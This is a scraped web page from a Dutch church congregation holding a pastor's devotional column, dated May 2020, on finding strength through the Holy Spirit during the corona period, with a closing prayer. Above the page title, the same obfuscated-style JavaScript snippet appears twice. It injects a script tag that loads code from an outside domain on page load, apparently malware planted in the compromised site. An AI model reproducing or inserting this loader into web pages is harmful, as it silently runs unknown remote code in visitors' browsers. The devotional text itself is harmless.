;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Waar haal je de kracht vandaan? - PKN Damwâld

Waar haal je de kracht vandaan?

Gepubliceerd op: vrijdag 15 mei 2020

Door heel wat situaties kan onze energie weggeroofd worden: zorgen – uitputting door ziekte – spanningen in de familie of op het werk.

Gelukkig komen er wat versoepelingen van de corona maatregelen – maar het blijft niet leuk. Een ongrijpbare vijand bedreigt ons leven. Leven was altijd al bedreigd – en tegelijk is er een nieuwe vijand bij gekomen. Hoe houd je vol? Waar haal je de kracht vandaan?

Juist wanneer we ons zwak voelen hebben we Gods Heilige Geest nodig. Jezus nodigde eens uit en zei: “Als iemand dorst heeft, laat hij tot Mij komen en drinken. Wie in Mij gelooft, zoals de Schrift zegt: Stromen van levend water zullen uit zijn binnenste vloeien. En dit zei Hij over de Geest, Die zij die in Hem geloven, ontvangen zouden” (Joh.7, 37 – 39).

Deze uitnodiging betekent in de eerste plaats dat we mogen erkennen dat we zwak zijn en onze kracht tekort schiet. In de tweede plaats mogen we met ons tekort – onze dorst – bij de Here komen om het levende water te ontvangen en daarbij vertrouwen dat Hij ook uitdeelt van het levende water. Het levende water is een beeld voor Gods Heilige Geest.

Here Jezus geef Uw levende water – geef van Uw Heilige Geest in mijn dorst en tekort. Geef dat het overvloeien mag en ook tot zegen is voor mensen om mij heen. Heilige Geest vul opnieuw mijn hart. Laat Uw kracht overstromen. Kom Heilige Geest.

Columnist:Ds. Otter

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns